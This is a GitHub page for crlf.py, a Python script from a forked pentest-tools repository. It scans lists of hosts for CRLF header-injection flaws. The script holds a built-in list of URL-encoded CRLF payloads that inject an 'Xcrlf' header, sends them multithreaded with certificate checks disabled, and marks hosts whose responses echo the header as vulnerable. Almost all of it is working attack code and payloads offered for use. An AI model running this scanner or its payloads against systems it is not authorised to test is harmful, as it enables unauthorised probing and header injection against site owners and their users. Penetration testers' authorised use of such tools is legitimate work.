forked from cehkunal/pentest-tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
crlf.py
executable file
·191 lines (161 loc) · 5.35 KB
/
crlf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import random
import argparse
import requests
from urllib.parse import urlparse
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def testURL( url ):
time.sleep( 0.01 )
t_urlparse = urlparse(url)
u = t_urlparse.scheme + '_' + t_urlparse.netloc
if not u in t_exceptions:
t_exceptions[u] = 0
if t_exceptions[u] >= 5:
return
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
try:
r = requests.get( url, timeout=2, verify=False )
except Exception as e:
t_exceptions[u] = t_exceptions[u] + 1
# sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return
if 'Content-Type' in r.headers:
content_type = r.headers['Content-Type']
else:
content_type = '-'
if 'Xcrlf' in r.headers:
vuln = 'VULNERABLE'
else:
vuln = '-'
output = '%sC=%d\t\tL=%d\t\tT=%s\t\tV=%s\n' % (url.ljust(t_multiproc['u_max_length']),r.status_code,len(r.text),content_type,vuln)
# sys.stdout.write( '%s' % output )
fp = open( t_multiproc['f_output'], 'a+' )
fp.write( output )
fp.close()
if str(r.status_code) in t_codes or (_vulnerable is True and vuln == 'VULNERABLE'):
sys.stdout.write( '%s' % output )
parser = argparse.ArgumentParser()
parser.add_argument( "-p","--payloads",help="set payloads list" )
parser.add_argument( "-o","--hosts",help="set host list (required)" )
# parser.add_argument( "-r","--redirect",help="follow redirection" )
parser.add_argument( "-s","--scheme",help="scheme to use, default=http,https" )
parser.add_argument( "-e","--code",help="display only status code separated by comma, default=none" )
parser.add_argument( "-t","--threads",help="threads, default 10" )
parser.add_argument( "-v","--vulnerable",help="display vulnerable (overwrite --code)", action="store_true" )
parser.parse_args()
args = parser.parse_args()
if args.scheme:
t_scheme = args.scheme.split(',')
else:
t_scheme = ['http','https']
if args.hosts:
t_hosts = []
if os.path.isfile(args.hosts):
fp = open( args.hosts, 'r' )
t_hosts = fp.readlines()
fp.close()
else:
t_hosts.append( args.hosts )
n_hosts = len(t_hosts)
sys.stdout.write( '%s[+] %d hosts found: %s%s\n' % (fg('green'),n_hosts,args.hosts,attr(0)) )
else:
parser.error( 'hosts list missing' )
if args.payloads:
t_payloads = []
if os.path.isfile(args.payloads):
fp = open( args.payloads, 'r' )
t_payloads = fp.readlines()
fp.close()
else:
t_payloads.append( args.payloads )
n_payloads = len(t_payloads)
sys.stdout.write( '%s[+] %d payloads found: %s%s\n' % (fg('green'),n_payloads,args.payloads,attr(0)) )
else:
t_payloads = [
'/%0dXcrlf%3a1',
'/%0aXcrlf%3a1',
'/%0d%0aXcrlf%3a1',
'/?%0dXcrlf%3acrlf=1',
'/%3F%0aXcrlf%3acrlf=1',
'/%0aXcrlf%3a1/..',
'/%23%0dXcrlf:1',
'/%23%0aXcrlf:1',
'/%23%0d%0aXcrlf:1',
'/xxx%0dXcrlf:1',
'/xxx%0aXcrlf:1',
'/xxx%0d%0aXcrlf:1',
'//xxx%0dXcrlf:1;',
'//xxx%0aXcrlf:1;',
'//xxx%0d%0aXcrlf:1;',
'/xxx/x%23%0dXcrlf:1',
'/xxx/x%3F%0dXcrlf:1',
'/v1/xx%20xx%0d%0aXcrlf:1',
'/api/v1/see%20below%0d%0aXcrlf:1',
'/%E5%98%8a%E5%98%8dXcrlf:1',
'/~bin/%0d%0aXcrlf:1',
]
if args.vulnerable:
_vulnerable = True
else:
_vulnerable = False
if args.code and not args.vulnerable:
t_codes = args.code.split(',')
t_codes_str = ','.join(t_codes)
else:
t_codes = []
t_codes_str = 'none'
if args.threads:
_threads = int(args.threads)
else:
_threads = 10
t_totest = []
u_max_length = 0
d_output = os.getcwd()+'/crlf'
f_output = d_output + '/' + 'output'
if not os.path.isdir(d_output):
try:
os.makedirs( d_output )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
sys.stdout.write( '%s[+] options are -> threads:%d, status_code:%s%s\n' % (fg('green'),_threads,t_codes_str,attr(0)) )
sys.stdout.write( '[+] computing host and payload list...\n' )
for scheme in t_scheme:
for host in t_hosts:
for payload in t_payloads:
u = scheme + '://' + host.strip() + payload
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
n_totest = len(t_totest)
sys.stdout.write( '%s[+] %d urls created.%s\n' % (fg('green'),n_totest,attr(0)) )
sys.stdout.write( '[+] testing...\n' )
random.shuffle(t_totest)
random.shuffle(t_totest)
# print("\n".join(t_totest))
# exit()
t_exceptions = {}
t_multiproc = {
'n_current': 0,
'n_total': n_totest,
'u_max_length': u_max_length+5,
'd_output': d_output,
'f_output': f_output,
'_vulnerable': _vulnerable,
}
pool = Pool( _threads )
pool.map( testURL, t_totest )
pool.close()
pool.join()